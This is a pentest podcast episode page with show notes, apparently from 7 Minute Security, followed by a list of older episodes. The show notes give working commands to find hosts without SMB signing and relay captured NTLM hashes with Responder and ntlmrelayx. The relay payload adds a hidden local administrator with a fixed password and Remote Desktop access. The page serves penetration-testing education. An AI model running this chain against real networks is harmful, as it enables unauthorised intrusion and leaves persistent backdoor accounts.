7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Heinä 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Jaksot(720)

7MS #295: Interview with Kevin Keane

7MS #295: Interview with Kevin Keane

Today I'm excited to be joined by my friend and advisor Kevin Keane (Twitter / LinkedIn) who is a lawyer, blogger, keynote speaker, business advisor, and just all around great guy. Kevin and I sit dow...

25 Tammi 201859min

7MS #294: GDPR Me ASAP

7MS #294: GDPR Me ASAP

GDPR in a nutshell GDPR, in a nutshell, is a set of legal regulations focused on the privacy of personal information for EU citizens - no matter where they are. Entities that store and/or process pers...

18 Tammi 201811min

7MS #293: How to Become a Packtpub Author - Part 2

7MS #293: How to Become a Packtpub Author - Part 2

Back in episode 280 I talked about how I started working with PacktPub to start authoring a video course on vulnerability scanning using Kali. Since that episode I've found that recording and editing ...

4 Tammi 201815min

7MS #292: OFF-TOPIC - How I Nearly Killed My Sister with a Snowball

7MS #292: OFF-TOPIC - How I Nearly Killed My Sister with a Snowball

Hey folks, I had originally planned to cover the CredDefense toolkit but I couldn't get it working. I'm basically having the same issue that someone reported here. Sooooo....will have to save that for...

28 Joulu 201711min

7MS #291: The Quest for Critical Security Controls - Part 4

7MS #291: The Quest for Critical Security Controls - Part 4

Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week: This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers a...

21 Joulu 201713min

7MS #290: Interview with Joe Klein

7MS #290: Interview with Joe Klein

My pal and former coworker Joe Klein joins me in the virtual studio to discuss: His career as a diesel mechanic and insurance guru How to leave a stable job, take a huge pay cut and start a risky inf...

14 Joulu 201752min

7MS #289: I'm Dipping My Toes in Windows Forensics

7MS #289: I'm Dipping My Toes in Windows Forensics

Two weird things happening in this episode: I'm not in the car, and thus not endangering myself and others while podcasting and driving! My once beloved lav mic made a trip through the Johnson fam...

7 Joulu 201713min

7MS #288: I'm BURPing a Lot

7MS #288: I'm BURPing a Lot

Sorry the podcast is late this week - but it's all for good reasons! I'm busy as a bee doing a ton of pentesting so I have a smattering of random security stuff to share with you: Mac High Sierra root...

1 Joulu 201714min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
aikalisa
politiikan-puskaradio
rss-ootsa-kuullut-tasta
ootsa-kuullut-tasta-2
tervo-halme
rss-podme-livebox
rss-pinnalla
rss-ulkopoditiikkaa
aihe
the-ulkopolitist
viisupodi
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-asiastudio
rss-kaikki-uusiksi
rss-toisten-taskuilla
rss-girls-finish-f1rst